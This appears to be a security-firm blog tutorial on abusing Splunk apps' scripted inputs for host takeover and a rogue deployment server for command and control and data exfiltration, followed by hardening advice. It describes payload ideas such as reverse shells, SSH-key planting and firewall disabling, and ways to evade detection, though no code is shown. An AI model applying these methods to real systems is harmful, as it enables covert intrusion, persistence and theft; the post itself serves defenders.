How to Leverage Splunk as an Offensive Security Tool
Splunk is a ubiquitous and powerful log collection tool. At its surface, the functionality and features appear to be straightforward; however, it is designed to allow for much more. Through the use of apps and add-ons, a lot of functionality can be added.
Splunk apps can range in complexity. They can be as simple as a single-line configuration file to much more complex tools that contain saved searches, user interface elements, and executable components. From the perspective of an attacker, apps containing executable code functionality is particularly interesting.
Understanding the inherent risks associated with Splunk’s various tools is important for those in both offensive and defensive security positions. This tutorial will demonstrate some of the approaches for using Splunk as an offensive tool, allowing you to reduce the likelihood they will be used as attack vectors.
Given access to a Splunk environment or the ability to manipulate Splunk configuration files, what types of attacks can be accomplished? Is it possible to leverage Splunk as a covert channel for remote command and control? If so, what degree of access can be gained, and how might an attacker leverage this tool?
Scenario #1: Gaining access to the Splunk host
Assuming access to the SplunkWeb interface, is it possible to gain access to the underlying Splunk host?
In this scenario, my goal will be to elevate a user with Splunk permissions to have system-level access to the underlying OS outside of the Splunk environment. To do this, we will use a specially crafted Splunk app that leverages the scripted input functionality provided within the software.
We’ll start by developing the app we need and testing it on our own development Splunk instance. Once we’re confident this app is working as expected, we can package it into something we can deploy on another Splunk instance.
This app will consist of two main components: a script and an inputs config to execute the script on a regular basis:
The bin directory contains the script that the app will execute. In this case, we will call this inputs.sh, but the name can be anything that you want–it will just need to match the name referenced in the inputs config.
Let’s start with a sample script that will let us know that the script is working properly:
This script simply outputs the date it runs and the network interface config for the system. There’s nothing malicious here yet, but it’s a good way to confirm that what we are doing is working correctly, as well as identifying what systems you have control over. This confirmation will be helpful in the next scenario.
NOTE: In order to be run by Splunk, this script will need to have the appropriate permissions (e.g., the execute bit must be set).
Now that we have a sample script, we will configure an inputs stanza to execute this script. This is done via inputs.conf in the local/ directory of the app.
This configuration will run the inputs.sh script every 300 seconds, and log the output to the main index, using the script sourcetype. When testing this, you will be able to run a search for index=main sourcetype=script and see the output of the script (the date and interface config) logged into Splunk. If this output is present and looks correct, this means the configuration is working correctly.
At this point, the script can be repurposed to do something more interesting than simply logging the date it runs. Some ideas:
- Add an SSH key to the system for a known user or for the root user
- Add a new user
- Disable the host firewall, or add an exception to allow you to log in
- Connect to an external server and pull down another script or executable
- Reverse Shell
The scripted input runs on a regular schedule. This acts as a built-in persistence mechanism, since Splunk will automatically re-run the script. There are also configuration options to have the script only execute a single time or at system startup.
To package the app for deployment, simply tar up the app as such:
NOTE: This file may also be named .spl (as a Splunk app). There is no difference in the format between a .tgz and an .spl file.
On the target system, navigate to Apps -> Manage Apps -> Install app from file. Select the app tarball we just created and upload. Once this app is installed, the script will execute on the schedule configured in inputs.conf.
As an alternative, if you have filesystem access, you can accomplish the same thing by extracting the tarball to $SPLUNK_HOME/etc/apps.
Depending on the payload of the script in this app, it is possible to use this approach to gain partial or complete control of the underlying host running Splunk. This is especially the case where Splunk is running as root instead of as a user with limited permissions. However, even if Splunk is not running as root, there is a wealth of information that can be obtained from Splunk itself that might be useful for gaining access to other systems within an enterprise network. These include accounts for authenticating to directory services, APIs, and SQL databases, to name a few. While Splunk stores passwords in config files in an encrypted way, it is relatively trivial to obtain the plaintext password if the encrypted form is available.
A similar app can be deployed for Windows systems running a PowerShell script. A sample Splunk app would consist of three files: an inputs.conf and a .path and .ps1 script.
The inputs.conf configuration for a Windows script is very similar:
This will execute the test_powershell.path script in the app’s bin directory. Any output for the script will be stored in the main index with the sourcetype of powershell.
The .path script serves as the glue to run the actual PowerShell script. Using generic paths would be superior to the hardcoded paths in this example.
The .ps1 script would contain the actual PowerShell payload.
Now that we’ve explored how to leverage a Splunk app for executing commands on a system, let’s expand the scope of our control beyond that of a single system.
Scenario #2: Using Splunk as a Command and Control Framework
Splunk has a built in mechanism for managing the configuration of other Splunk systems throughout the environment. How do we exploit this functionality to do more than just manage Splunk?
A Splunk deployment often consists of two major components: the Splunk infrastructure itself (indexers, search heads, heavy/intermediate forwarders, etc.) and the Splunk Universal Forwarders (running on endpoints and servers).
The Splunk Universal Forwarder is the recommended method for collecting logs from a supported machine–it allows for monitoring files and events from a system and forwarding those logs into the Splunk environment. However, the Universal Forwarder provides significantly more functionality than simply monitoring and reading log files. It also has the ability to run scripted inputs, which can be used on both Linux–as in the previous example–and Windows (PowerShell) machines.
A typical environment will have several core Splunk infrastructure systems as well as many Universal Forwarders. In a large deployment, this can mean hundreds or thousands of systems running Splunk that need to have their configurations managed.
To accomplish this, Splunk provides a feature called deployment server. When you configure deployment server:
- A central Splunk instance serves as a configuration store and contains all of the Splunk apps (in this case, primarily sets of configurations) that are needed within the environment.
- Splunk instances to be managed by the deployment server are configured as deployment clients through the deploymentclient.conf configuration file.
- A server class, which is a group of clients and associated apps, defines what apps are installed on which clients.
- The Deployment Server can provide configuration and install apps to both full Splunk Enterprise installations as well as Universal Forwarders.
A deployment client will regularly connect to the configured deployment server to check for new configurations. By default, this happens every minute (phoneHomeIntervalInSecs = 60). When checking in, the deployment client will check for any changes in the apps that it should have installed. If a change is recorded, the new apps will be downloaded and installed.
Fundamentally, this deployment client function already contains the basic features needed for a command and control system: clients will regularly check in to a system and pull down updated configuration. Since the apps distributed from the deployment server may contain executable scripts–and Universal Forwarders are often installed as root or are otherwise running with system level permissions–we can use this functionality to run arbitrary code on a large number of systems.
While it’s possible to use the deployment server functionality to hijack existing Splunk systems, there is also an additional use case here–configuring a rogue Splunk deployment to serve as a command and control as well as a data exfiltration platform.
Essentially, we have two approaches available, both using Splunk. If an environment is using Splunk already, hijack it. If there isn’t any Splunk yet, install it and use it as an attack platform.
Using Splunk in this way has a few advantages–or at least comparable functionality–over a purpose-designed tool using existing malware:
- The Splunk Universal forwarder is a trusted application produced by a legitimate publisher. This software would not be flagged as suspect by anti-virus or anti-malware software.
- While Splunk communication typically happens over TCP/8089, this can be modified to run on any TCP port. I have run this on TCP/443 without any problem. From the perspective of a web filter or firewall, Splunk Deployment Server communication would look like normal web traffic.
- The check-in interval for deployment clients is easily configured and can be adjusted remotely.
- The Splunk Universal Forwarder is designed for reading files and forwarding data. This is perfect for exfiltrating data from an environment where outbound communication is allowed. Thresholds can be set to limit the bandwidth used to reduce the likelihood of detection.
- The Universal Forwarder natively supports most Windows, Linux, and MacOS distributions.
- There is native support for running scripted inputs, such as bash and PowerShell scripts.
There are a few disadvantages as well:
- The Universal Forwarder installer is a significantly larger download than purpose-built malware.
- Connection to a central instance is required to make this practical (but that’s the whole point of command and control, right?)
The command and control functionality can be configured in the Splunk Universal Forwarder by using the deploymentclient.conf file. A basic example would look like this:
The port number may be updated if a different one is desired. Note that this will require that splunkd on the central instance be configured to listen on this port.
A system running Splunk with this configuration will check into rogue.splunkinstance.com every 60 seconds. From this deployment server it will be possible to install any Splunk app (including the scripted input example in Scenario 1).
Now that we’ve seen what can be done to attack Splunk systems and leverage Splunk as an attack framework, what can we do to identify and potentially prevent these attacks from being successful?
Do not run Splunk as root.
The Splunk Enterprise documentation considers this to be a best practice (http://docs.splunk.com/Documentation/Splunk/7.0.3/Installation/RunSplunkasadifferentornon-rootuser), but it is commonplace to see Splunk running as root to simplify administration. When Splunk is running as root, it is trivial to utilize Splunk to gain complete access to the underlying host given Splunk administrator access.
Do not run Splunk Universal Forwarders as root or as an administrator.
Running Splunk Universal Forwarders with limited permissions is more complicated and can make reading the data you need more difficult, but it enhances system security. It significantly reduces the ability of an attacker to leverage the Universal Forwarder as an attack vector.
Be aware of rogue Splunk instances.
All legitimate Splunk forwarders should be controlled by an authorized Splunk deployment server and be configured to forward data to legitimate Splunk indexers.
Use Splunk to monitor for environment changes.
Events such as forwarders restarting and no longer connecting to the official Splunk instance warrant investigation. If a deployment server is not used, the addition of a deploymentserver.conf file should immediately be investigated. If a deployment server is in use, the configuration should also be monitored for any changes to this file.
Ensure that internal logs of all Splunk systems and Splunk Universal Forwarders are sent to your central Splunk instance.
These configuration changes will be often picked up in the internal logs prior to a system disappearing from your environment.
By default, this is set to admin/changeme. This is no longer the case for Splunk 7.1 and later.
Principle of least access.
Limit the number of users with Splunk administrator permissions. Limit access to the deployment server to the smallest scope practical.
Limit outbound access.
With the exception of app updates from splunkbase.splunk.com (and some other types of updates, such as automatic threatlist updates), most Splunk systems do not need to have outbound access to the Internet. Limiting the scope of this access or forcing systems to use a proxy can make remote CNC and data exfiltration much more difficult to accomplish successfully.
Expand your thoughts around SIEM strategy.
Consider your SIEM as a critical part of your IR monitoring and response strategy–not just as a monitoring tool itself, but as a potential target as well.
Hopefully this article was helpful in understanding the attack vectors facing a Splunk deployment and the steps to reduce the associated risks. If you have any questions about these exploits and mitigation strategies, please reach out to me at @tomkopchak on Twitter. Thanks for reading.
About Hurricane Labs
Hurricane Labs is a dynamic Managed Services Provider that unlocks the potential of Splunk and security for diverse enterprises across the United States. With a dedicated, Splunk-focused team and an emphasis on humanity and collaboration, we provide the skills, resources, and results to help make our customers’ lives easier.
For more information, visit www.hurricanelabs.com and follow us on Twitter @hurricanelabs.